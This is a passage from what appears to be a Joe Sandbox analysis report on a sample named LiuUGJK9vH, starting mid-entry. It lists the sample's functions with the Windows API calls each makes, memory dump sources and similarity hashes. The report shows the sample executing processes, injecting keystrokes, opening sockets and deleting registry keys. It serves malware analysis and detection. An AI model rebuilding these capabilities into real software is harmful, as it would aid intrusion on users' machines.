                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                      • String ID:
                      • API String ID: 4072528602-0
                      • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                      • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                      • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                      • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                      Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 0047F448
                      • _memset.LIBCMT ref: 0047F511
                      • ShellExecuteExW.SHELL32(?), ref: 0047F556
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                        • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                      • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                      • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                      • String ID: @
                      • API String ID: 3522835683-2766056989
                      • Opcode ID: 65c6d4541a5957c05215061cc8cd0f59e5773d27fbd8cd7ace82404b80ebb491
                      • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                      • Opcode Fuzzy Hash: 65c6d4541a5957c05215061cc8cd0f59e5773d27fbd8cd7ace82404b80ebb491
                      • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                      Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(?), ref: 00460F8C
                      • GetKeyboardState.USER32(?), ref: 00460FA1
                      • SetKeyboardState.USER32(?), ref: 00461002
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                      • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                      • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                      • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                      Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(00000000), ref: 00460DA5
                      • GetKeyboardState.USER32(?), ref: 00460DBA
                      • SetKeyboardState.USER32(?), ref: 00460E1B
                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                      • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                      • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                      • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                      Function 02F97B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                      Download Yara Rule
                      APIs
                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02F98311,?,00000000,?,00000000,00000000), ref: 02F97BDE
                      • __fassign.LIBCMT ref: 02F97C59
                      • __fassign.LIBCMT ref: 02F97C74
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02F97C9A
                      • WriteFile.KERNEL32(?,?,00000000,02F98311,00000000,?,?,?,?,?,?,?,?,?,02F98311,?), ref: 02F97CB9
                      • WriteFile.KERNEL32(?,?,00000001,02F98311,00000000,?,?,?,?,?,?,?,?,?,02F98311,?), ref: 02F97CF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      • Opcode ID: 8ffe254d292831bb474da5bfd037be3869e68bc40c50a39f8bd696b6f3529e8c
                      • Instruction ID: 5a0a31b1157d08fa3b57a8be0b0f4fee8f7bd2ded9bf014ecc09b39f28a99bb0
                      • Opcode Fuzzy Hash: 8ffe254d292831bb474da5bfd037be3869e68bc40c50a39f8bd696b6f3529e8c
                      • Instruction Fuzzy Hash: 6C51B3B1E102099FEF10DFA8D884AEEFBB4EF09344F14455AE656E7281D730A951CFA0
                      Function 004655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _wcsncpy$LocalTime
                      • String ID:
                      • API String ID: 2945705084-0
                      • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                      • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                      • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                      • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                      Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorMode$AddressCreateInstanceProc
                      • String ID: ,,I$DllGetClassObject
                      • API String ID: 753597075-1683996018
                      • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                      • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                      • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                      • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                      Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 004872AA
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                      • IsMenu.USER32(?), ref: 00487369
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                      • DrawMenuBar.USER32 ref: 004873C4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Menu$Item$DrawInfoInsert_memset
                      • String ID: 0
                      • API String ID: 3866635326-4108050209
                      • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                      • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                      • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                      • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                      Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                      • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                        • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                        • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                        • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                      • String ID:
                      • API String ID: 395352322-0
                      • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                      • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                      • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                      • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                      Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                      • GetWindowLongW.USER32(00AC3480,000000F0), ref: 0048631F
                      • GetWindowLongW.USER32(00AC3480,000000F0), ref: 00486354
                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LongWindow$MessageSend
                      • String ID:
                      • API String ID: 2178440468-0
                      • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                      • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                      • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                      • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                      Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                      • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                      • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                      • WSAGetLastError.WSOCK32 ref: 00476221
                      • closesocket.WSOCK32(00000000), ref: 0047624A
                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                      • String ID:
                      • API String ID: 910771015-0
                      • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                      • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                      • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                      • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                      Function 004875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                        • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                        • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$CreateObjectStockWindow
                      • String ID: Msctls_Progress32
                      • API String ID: 1025951953-3636473452
                      • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                      • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                      • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                      • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                      Function 02F93216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 02F931DA: _free.LIBCMT ref: 02F93203
                      • _free.LIBCMT ref: 02F93264
                        • Part of subcall function 02F92096: HeapFree.KERNEL32(00000000,00000000,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?), ref: 02F920AC
                        • Part of subcall function 02F92096: GetLastError.KERNEL32(?,?,02F93208,?,00000000,?,00000000,?,02F9322F,?,00000007,?,?,02F92697,?,?), ref: 02F920BE
                      • _free.LIBCMT ref: 02F9326F
                      • _free.LIBCMT ref: 02F9327A
                      • _free.LIBCMT ref: 02F932CE
                      • _free.LIBCMT ref: 02F932D9
                      • _free.LIBCMT ref: 02F932E4
                      • _free.LIBCMT ref: 02F932EF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                      • Instruction ID: 0d32aaa6b576f40f9e5ee56d83bf84526cf6375dcdc21648d2206062269e265f
                      • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                      • Instruction Fuzzy Hash: ED11DD72E40B04BAFD30FBB0CC45FCB779E6F057C1F404855ABAA66160DA65A5488F51
                      Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                      • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                      • EncodePointer.KERNEL32(00000000), ref: 00424097
                      • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                      • String ID: RoUninitialize$combase.dll
                      • API String ID: 3489934621-2819208100
                      • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                      • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                      • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                      • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                      Function 02F944E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,02F9473A,?,?,00000000), ref: 02F94543
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02F9473A,?,?,00000000,?,?,?), ref: 02F945C9
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02F946C3
                      • __freea.LIBCMT ref: 02F946D0
                        • Part of subcall function 02F932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02F9332C
                      • __freea.LIBCMT ref: 02F946D9
                      • __freea.LIBCMT ref: 02F946FE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID:
                      • API String ID: 1414292761-0
                      • Opcode ID: aa1fb9c6de21a3e0290f4ec31900b645d18e4557a9c3a098a4cb61a54d389ef5
                      • Instruction ID: f4cabdb98b7624e7de54a7db0affaa92ffc1103ff4f9c4db02cacdb918cc38b6
                      • Opcode Fuzzy Hash: aa1fb9c6de21a3e0290f4ec31900b645d18e4557a9c3a098a4cb61a54d389ef5
                      • Instruction Fuzzy Hash: 1C51D3B2A00216AFFF258E64CC40EAFB7AAEB54794B154629FE04D7180EB74DC55CE50
                      Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
